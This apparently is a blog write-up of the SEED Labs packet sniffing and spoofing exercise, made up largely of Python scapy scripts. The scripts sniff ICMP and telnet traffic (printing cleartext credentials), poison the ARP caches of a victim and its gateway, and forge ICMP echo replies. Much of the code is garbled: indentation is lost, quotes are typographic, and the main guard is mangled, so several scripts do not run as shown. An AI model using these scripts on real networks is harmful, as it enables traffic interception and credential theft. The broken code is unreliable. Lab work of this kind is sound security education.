SEEDLAB_Packet Sniffing and Spoofing Lab


SEEDLAB_Packet Sniffing and Spoofing Lab


  • Capture only the ICMP packet
    #-*-coding:utf-8-*-
    from scapy.all import *
    

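def print_pkt(pkt):
    """sniff() callback: print the full layer-by-layer dissection of one packet.

    Args:
        pkt: the packet object scapy hands to the ``prn`` callback.

    Returns:
        None; output goes to stdout via ``pkt.show()``.
    """
    # The body was pasted without indentation, which is a syntax error as written.
    pkt.show()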

pkt = sniff(iface=”ens33”,filter=”icmp”,prn=print_pkt)


*  Capture any TCP packet that comes from a particular IP and has destination port number 23
```python
#-*-coding:utf-8-*-
from scapy.all import *

def print_pkt(pkt):
    """Dump every layer of a sniffed packet to stdout (sniff() ``prn`` callback)."""
    show = pkt.show
    show()

pkt = sniff(iface="ens33",filter="tcp net 192.168.209.131 and tcp dst port 23",prn=print_pkt)
  • Capture packets that come from or go to a particular subnet. You can pick any subnet, such as 128.230.0.0/16; you should not pick the subnet that your VM is attached to.
    #-*-coding:utf-8-*-
    from scapy.all import *
    

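def print_pkt(pkt):
    """sniff() callback: print the full layer-by-layer dissection of one packet.

    Args:
        pkt: the packet object scapy hands to the ``prn`` callback.

    Returns:
        None; output goes to stdout via ``pkt.show()``.
    """
    # The body was pasted without indentation, which is a syntax error as written.
    pkt.show()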

pkt = sniff(iface=”ens33”,filter=”net 192.168.202”,prn=print_pkt)


* send a packet
```python
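#-*-coding:utf-8-*-
from scapy.all import *

# Build an ICMP echo request (scapy's ICMP() default type is 8) for
# 192.168.202.1 with a TTL of 3 and hand it to send(), which routes it at
# layer 3 and fills in the source address and checksums. ls(a) then lists the
# IP header fields together with their current values.
# The coding line above was missing its leading "#" in the paste.
a = IP()
a.dst = '192.168.202.1'
a.ttl = 3
b = ICMP()
p = a / b
send(p)
ls(a)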
  • Sniffing telnet
    #-*-coding:utf-8-*-
    from scapy.all import *
    

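def print_pkt(pkt):
    """sniff() callback: print the raw payload of one captured TCP segment.

    ``sprintf("%Raw.load%")`` renders the Raw layer's load as text. For telnet
    that is the cleartext session, keystrokes and credentials included, which is
    the point of the exercise.

    Args:
        pkt: the packet object scapy hands to the ``prn`` callback.

    Returns:
        None; the payload is written to stdout.
    """
    # Pasted with typographic quotes and a Python 2 print statement; print()
    # works on both Python 2 and 3.
    raw = pkt.sprintf("%Raw.load%")
    print(raw)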

pkt = sniff(iface=”ens33”,filter=”tcp”,prn=print_pkt)



* Sniffing and then Spoofing

```python
#响应arp报文
#-*-coding:utf-8-*-

from scapy.all import *

def init_arp():
    """Broadcast three ARP requests announcing 192.168.20.1 at 00:0c:29:e1:95:00.

    Sender and target protocol address are the same, the gratuitous-ARP
    pattern, so the frame is not really asking a question: it advertises a
    192.168.20.1 -> 00:0c:29:e1:95:00 binding that hosts already holding an
    entry for that IP may refresh. Static ARP entries and switch-side Dynamic
    ARP Inspection exist precisely to stop unsolicited bindings like this one
    from being accepted.
    """
    ether = Ether()
    ether.dst = "ff:ff:ff:ff:ff:ff"   # link-layer broadcast: every host on the segment sees it
    ether.src = "00:0c:29:e1:95:00"   # hard-coded MAC of the sending VM (same value as hwsrc)

    arp = ARP()
    arp.psrc = '192.168.20.1'   # sender IP == target IP: gratuitous pattern
    arp.hwsrc = '00:0c:29:e1:95:00'
    arp.pdst = '192.168.20.1'
    arp.hwdst = 'ff:ff:ff:ff:ff:ff'
    arp.op = 1                  # 1 = who-has (request)
    p = ether/arp
    for i in range(3):          # sent three times, presumably so a dropped frame still lands
        sendp(p)                # layer-2 send: the Ether header built above is used as-is

def sniff_spool_arp(pkt):
    """sniff() callback: answer every broadcast ARP frame with a reply binding the
    asked-for IP to this VM's MAC.

    Only the Ethernet destination is tested, not the ARP opcode, so any
    broadcast ARP frame — whoever sent it and whatever IP it names — gets three
    replies claiming 00:0c:29:e1:95:00. Many IPs resolving to a single MAC is
    the signature tools such as arpwatch or a switch's Dynamic ARP Inspection
    are built to flag.
    """
    if pkt[0][Ether].dst == "ff:ff:ff:ff:ff:ff":
        a = ARP()
        a.pdst = pkt[0][ARP].psrc   # reply is addressed to whoever asked
        a.hwsrc = "00:0c:29:e1:95:00" # VM MAC address
        a.psrc = pkt[0][ARP].pdst   # claim the IP that was asked about
        a.hwdst = pkt[0][ARP].hwsrc
        a.op = 2 # opcode 2 = is-at (reply)
        for i in range(3):
            send(a)                 # layer-3 send: scapy supplies the Ethernet header itself


init_arp()   # announce the 192.168.20.1 binding before listening
# Then answer ARP on ens33 until interrupted; store=0 drops each frame after the
# callback runs, so a long capture does not accumulate in memory.
pkt = sniff(iface="ens33",filter="arp",prn=sniff_spool_arp,store=0)
  • 改进版arp欺骗
    #-*-coding:utf-8-*-
    

from scapy.all import *
import sys

#-*-

def attack_host():
# NOTE(review): the body below lost its indentation in the paste; it belongs inside attack_host.
# Sends the victim host a unicast ARP request in which the gateway's IP (gw_ip)
# is bound to attacker_mac, so the victim's cache maps the gateway to the attacker.
# Reads the module globals host, host_mac, gw_ip and attacker_mac set in the main block.
ether = Ether()
ether.dst = host_mac        # unicast to the victim rather than broadcast
ether.src = attacker_mac # attacker's MAC

arp = ARP()
arp.psrc = gw_ip            # claim the gateway's IP ...
arp.hwsrc = attacker_mac    # ... is at the attacker's MAC
arp.pdst = host
arp.hwdst = host_mac
arp.op = 1                  # 1 = who-has (request)
p = ether/arp
for i in range(3):          # repeated three times, presumably for reliability
    sendp(p)                # layer-2 send with the Ether header built above

def attack_gw():
# NOTE(review): the body below lost its indentation in the paste; it belongs inside attack_gw.
# Mirror image of attack_host: sends the gateway a unicast ARP request binding the
# victim's IP (host) to attacker_mac, so traffic for the victim is steered to the
# attacker. Reads the module globals host, gw_ip, gw_mac and attacker_mac.
ether = Ether()
ether.dst = gw_mac
ether.src = attacker_mac

arp = ARP()
arp.psrc = host             # claim the victim's IP ...
arp.hwsrc = attacker_mac    # ... is at the attacker's MAC
arp.pdst = gw_ip
arp.hwdst = gw_mac
arp.op = 1                  # 1 = who-has (request)
p = ether/arp
for i in range(3):
    sendp(p)

def sniff_spool_arp(pkt):
# NOTE(review): indentation lost in the paste; the body below belongs inside
# sniff_spool_arp, and send(a) belongs under the for loop.
# Answers each sniffed ARP frame (the BPF filter in the main block limits them to
# the victim and gateway addresses) with a reply binding the asked-for IP to
# attacker_mac. Unlike the earlier version there is no broadcast check, and
# still no opcode check, so replies are answered with replies too.
a = ARP()
a.pdst = pkt[ARP].psrc
a.hwsrc = attacker_mac # attacker's MAC
a.psrc = pkt[ARP].pdst
a.hwdst = pkt[ARP].hwsrc
a.op = 2 # opcode 2 = is-at (reply)
for i in range(3):
send(a)

if name == ‘main‘:
# NOTE(review): garbled in the paste — presumably the `if __name__ == '__main__':`
# guard, with everything below indented under it.
# Usage: <script> <gateway-ip> <victim-ip>. Both MACs are resolved with
# getmacbyip (an ARP lookup); the attacker's own MAC is read from the interface
# scapy reports as working.
gw_ip = sys.argv[1]
gw_mac = getmacbyip(gw_ip)
host = sys.argv[2]
host_mac = getmacbyip(host)
iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)

attack_host()   # poison the victim's entry for the gateway
attack_gw()     # poison the gateway's entry for the victim

# Keep answering ARP that involves either address. NOTE(review): sniff() is
# pinned to "ens33" while attacker_mac came from get_working_if(); on another
# machine the two may not be the same interface.
pkt_filter = "arp net "+host+" or arp net "+gw_ip
pkt = sniff(iface="ens33",filter=pkt_filter,prn=sniff_spool_arp,store=0)

```python
#-*-coding:utf-8-*-
#响应icmp报文
from scapy.all import *

def send_icmp(pkt):
    """sniff() callback: forge an ICMP echo reply for whatever echo was sniffed.

    Addresses are swapped and id/seq/payload copied from the sniffed packet so
    the reply matches what the sender's ping is waiting for. Nothing checks that
    the sniffed packet is a request (type 8) or that it is not this script's own
    reply, which sniff() also sees on the wire; the version further down adds a
    source-MAC check for that. pkt[0][Raw] raises IndexError when the packet
    carries no payload.
    """
    a = IP()
    a.dst = pkt[0][IP].src   # reply goes back to the original sender ...
    a.src = pkt[0][IP].dst   # ... and appears to come from the pinged address
    b = ICMP()
    b.id = pkt[0][ICMP].id   # identifier and sequence must match for ping to accept it
    b.seq = pkt[0][ICMP].seq
    b.type = 0               # 0 = echo reply
    b.code = 0
    c = Raw()
    c.load = pkt[0][Raw].load   # echo the payload back, as a real reply would
    p = a/b/c
    send(p)                     # layer-3 send; scapy supplies the Ethernet header

pkt = sniff(iface="ens33",filter="icmp",prn=send_icmp)
  • 改进版icmp欺骗
    #-*-coding:utf-8-*-
    #响应icmp报文
    from scapy.all import *
    

# The interface scapy reports as working, and its hardware address; send_icmp
# below uses the latter to recognise this host's own outgoing frames.
iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)

def send_icmp(pkt):
# NOTE(review): indentation lost in the paste; everything below belongs inside
# send_icmp, and the assignments belong under the if.
# Same forged echo reply as the earlier send_icmp, except frames whose Ethernet
# source is this host's own MAC are skipped, so the script no longer reacts to
# the replies it sends itself.
if pkt[0][Ether].src != attacker_mac:
a = IP()
a.dst = pkt[0][IP].src
a.src = pkt[0][IP].dst
b = ICMP()
b.id = pkt[0][ICMP].id
b.seq = pkt[0][ICMP].seq
b.type = 0 # 0 = echo reply
b.code = 0
c = Raw()
c.load = pkt[0][Raw] # NOTE(review): this is the whole Raw layer, whereas the earlier version copied pkt[0][Raw].load — confirm which was intended
p = a/b/c
send(p)

pkt = sniff(iface=”ens33”,filter=”icmp”,prn=send_icmp,store=0)


* 受害机添加网关
`sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.20.1`

* 验证

攻击机先后run sniff_spoof_arp脚本和sniff_spoof_icmp脚本
![](https://raw.githubusercontent.com/Danie1233/img/master/run.png)
然后
受害主机ping一个不存活的地址,会收到响应,欺骗成功
![](https://raw.githubusercontent.com/Danie1233/img/master/pingisok.png)



文章作者: Danie1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !